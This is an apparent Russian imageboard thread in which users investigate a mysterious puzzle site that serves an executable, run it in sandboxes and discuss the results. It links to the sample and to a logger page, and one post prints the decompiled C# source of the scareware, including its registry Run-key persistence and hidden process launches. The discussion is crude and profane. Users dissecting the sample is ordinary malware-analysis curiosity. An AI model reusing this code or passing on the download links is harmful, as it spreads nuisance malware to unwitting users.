DL5DL91DL125DL5821DL25819DL128129DL1265732DL56271229DL671292922DL2358219690Hankclan.bizЧто это за говно? Нашел на 4chan в разделе /х/
Hankclan.biz ==> http://hankclan.biz/52821993722572.html
Бумп неведомой хуйнёй
>>163959831> Для ленивых
>>163959831Куда там нажимать ?
>>163959999Непонял, если ты про первую ссылку то там при копировании текста выделяются невидимые цифры
>>163960039И добавив к hankclan.biz/ эти цифры + .html покажется дьявол
Опять эти арг всякие
>>163960091НО при первом переходе мне показало какую-то загадку, я закрыл вкладку случайно зассал чего-то, а потом переходя по ссылке показался этот демон
>>163960091Страшна, вырубай
>>163960136Как что-то плохое перейди по ссылке , если покажется НЕ ДЕМОН, то скинь скрин в чат позязя :3
>>163960237Это что-то на CICADA 3310 похоже
я все правильно делаю?
>>163960285Похожее*
>>163960294Ты Иисус , а я походу даун
вы все черти
>>163960285>CICADA 3310Что это ?
>>163960399Неужели гугол и википедия забанила?
>>163960451Я хочу чтобы ты мне рассказал
http://hankclan.biz/52821993722571.htmlПросто поменял одну цифру
>>163960496CICADA 3310 - это группа сектантов, которые вербуют к себе людей прошедших испытания-загадки
>>163960571Что там за файл ?
>>163960571По ссылке какой то файл скачивается ufile.io/a4lc7
>>163960603Спасибо !
Подпишсь на тред, аноны, гадайте, а результаты сюда. А я смотреть буду.
>>163960677lord.exe весом в 26мбСейчас попробую чего-нибудь с ним сделать
>>163960749А ты смелый.
>>163960749Только со скринами плес
>>163959779 (OP)Это идионфекция. Вы идионфецированы. ньбфаги не знают
>>163960832Я с телефона, не могу файл открыть
>>163960793https://www.virustotal.com/#/file/77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653/detectionВроде чисто,но имя файла показывает как 666.exeВместо lord.exe
>>163960832Нужно ставить виртуалку,но мне очень лень
>>163960853Нихуя не чисто.
>>163960903Поставь, будь няшей :3
>>163960923Это ноунейм же антивирусы
>>163961000Все равно подозрительно.
>>163960982Тогда ждите,пока образ скачаю и саму vb
>>163961028Не над, я уже.
>>163961053Ну и шо тама ?
>>163961013> Название файла 666.ехе > подозрительно
>>163961053Скрины в студию
>>163961102Please wait while VxStream Sandbox v7.00 is processing your sample (SHA256: 77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653).Once the analysis is completed you will be redirected automatically.
>>163961128Там ещё на сайте логгер естьhttp://scorecard.wspisp.net/logger.php
>>163959779 (OP)Хуясе, вот это зашел на двачик мдо.
Висит
>>163961269Тебя сейчас рептилойды к себе завербуют, беги отсюда
>>163961306В треде есть психи, которые смогут это на комп поставить?
>>163961306Кароч,если погуглить,то VxStream Sandbox это что-то типа rat'ника
>>163961396> Кароч,если погуглить,то VxStream Sandbox это что-то типа rat'никаДля не просвященных поясни что это такое
>>163961396This webpage is a free malware analysis service powered by Payload Security that detects and analyzes unknown threats using a unique Hybrid Analysis technology.
>>163961428rat - удалённое управление компьютеромТам их много разновидностей,но суть таковаКароч,я не думаю,что это что-то в духе цикадыПросто кто-то решил сыграть на любопытности людей
>>163961432https://www.youtube.com/watch?v=lPhDtPa0QMg
НЕ ТОНЕМ, РЕБЯТА, НЕ ТОНЕМ!
>>163961428Ремоте Администратион Тул
Ещё не вскрыли тему ?
https://www.hybrid-analysis.com/sample/77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653?environmentId=100
>>163961516>>163961578Спасибо за пояснение :3
>>163961516>Просто кто-то решил сыграть на любопытности людейВозможно.Но возможно так же, что это следующий ключ к разгадке квеста.
>>163961387Вряд ли. Если только на левое железо, которое под снос. Тут же все параноики.
>>163961674С вирусней однозначно связано Автоматизация чего-то там
Скрин с виртуалки
>>163961724> VirusMy228> 4chan /х/Ничего удивительного
Сетевой трафик172.217.16.142 443TCP - United States172.217.16.142 80TCP - United States172.217.16.132 80TCP - United States
>>163961724Ставим wireshark и смотрим куда запросы идут,анализируем и готово
>>163961778И ты жив ? не обосрался?
>>163961724> 228
>>163961846Ip адресс дьявола?
Если хотите с деобфускацие поебаться, то продолжайте.
>>163961846Мб он шлет запросы, пока не получит ответ?Сколько он пакетов отослал уже?И с какой переодичностью?
>>163961902Вычислишь?
>>163962025Я не погромист
>>163961846>172.217.16.142 80>TCP - United States>172.217.16.132 80>TCP - United StatesПо этим гугл находится
Информация об ip-адресе 172.217.16.142#OrgName: Google LLC
>>163961724Блять, я думал ты прикалываешься
>>163962116На C# накалякал какой-то школьник и пытается толкнуть
>>1639618630Н УЖЕ С НАМИ
На форчане потёрли тред
>>163962114Корпорация добра?
>>163961930Почистил немного.
Ребята не стоит вскрывать эту тему. Вы молодые, шутливые, вам все легко. Это не то. Это не Чикатило и даже не архивы спецслужб. Сюда лучше не лезть. Серьезно, любой из вас будет жалеть. Лучше закройте тему и забудьте что тут писалось. Я вполне понимаю что данным сообщением вызову дополнительный интерес, но хочу сразу предостеречь пытливых - стоп. Остальные просто не найдут.
/°\
>>163962511Как я и говорил.Школьник - быдлокодер толкает свой кривой вирус.Он даже не проверяет какая винда стоит,потому что в разных версиях - разные пути в реестре,для автозапуска.Даже стыдно немного за него
>>163962511Короч вот весь код: private void Form1_Load(object sender, EventArgs e) { Class3.Class2_0.Audio.Play(Class1.smethod_1(), AudioPlayMode.BackgroundLoop); this.method_0(Class1.smethod_2()); this.Cursor = new Cursor(Class1.smethod_3().Handle); Class3.Class2_0.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue(Application.ProductName, Application.ExecutablePath); this.vmethod_0().Enabled = !this.vmethod_0().Enabled; VBMath.Randomize(); int num = checked((int)Math.Round((double)Conversion.Int(99999f VBMath.Rnd() + 1f))); Process process = new Process(); process.StartInfo.WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.System); process.StartInfo.FileName = "taskmgr.exe"; process.StartInfo.CreateNoWindow = true; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.Start(); base.Focus(); process.StartInfo.WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.System); process.StartInfo.FileName = "regedt32.exe"; process.StartInfo.CreateNoWindow = true; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.Start(); base.Focus(); } [DebuggerStepThrough] private void InitializeComponent() { this.icontainer_0 = new Container(); this.vmethod_1(new Timer(this.icontainer_0)); base.SuspendLayout(); this.vmethod_0().Interval = 200; base.AutoScaleDimensions = new SizeF(6f, 13f); base.AutoScaleMode = AutoScaleMode.Font; base.ClientSize = new Size(212, 206); base.ControlBox = false; base.FormBorderStyle = FormBorderStyle.None; base.Margin = new Padding(2); base.Name = "Form1"; base.Opacity = 0.01; base.ShowIcon = false; base.ShowInTaskbar = false; this.Text = "Explorer (isn't responding)"; base.WindowState = FormWindowState.Maximized; base.ResumeLayout(false); } internal void method_0(Image image_0) { string str = Class3.Class2_0.FileSystem.CombinePath(Class3.Class2_0.FileSystem.SpecialDirectories.MyPictures, "c:\\wallpaper.bmp"); try { image_0.Save(str, ImageFormat.Bmp); Form1.SystemParametersInfo(20, 0, ref str, 3); } catch (Exception exception1) { ProjectData.SetProjectError(exception1); Exception exception = exception1; Interaction.MsgBox(string.Concat("There was an error setting the wallpaper: ", exception.Message), MsgBoxStyle.OkOnly, null); ProjectData.ClearProjectError(); } } private void method_1(object sender, EventArgs e) { if (base.Opacity <= 0.05 | base.Opacity >= 0.65) { this.double_0 = -this.double_0; } base.Opacity = base.Opacity + this.double_0; this.BackColor = Color.FromArgb(checked((int)Math.Round((double)(255f VBMath.Rnd()))), 0, 0); }Ставим обоину и играем звуки. Ну и в автозагрузку прописываемся.
>>163962666Ебаный демон
>>163962666Ни тебе try catch.В ООП пацан не шарит,от слова "Совсем".Реализовал в ооп среде процедурный код,красавец
>>163962861>VBMath.Rnd()Я думаю тут и говорить не о чем.
>>163962903Особенно имена "методов" доставилиmethod_0 и method_1Это гениально
>>163962979ООП ЖЕ ТАМ МЕТАДЫ РЕБЯТ Я ШАРЮ
>>163962979Ты дебич? Это деобфускатор переименовал битые имена.
>>163964520Тем не менее,это не отменяет того,что он криворукий
>>163964628Он на vb.net писал, там все кривое.
Киньте загадку от настоящей цикады чтоли
>>163966335Я просто хуй, сижу на паре и не могу искать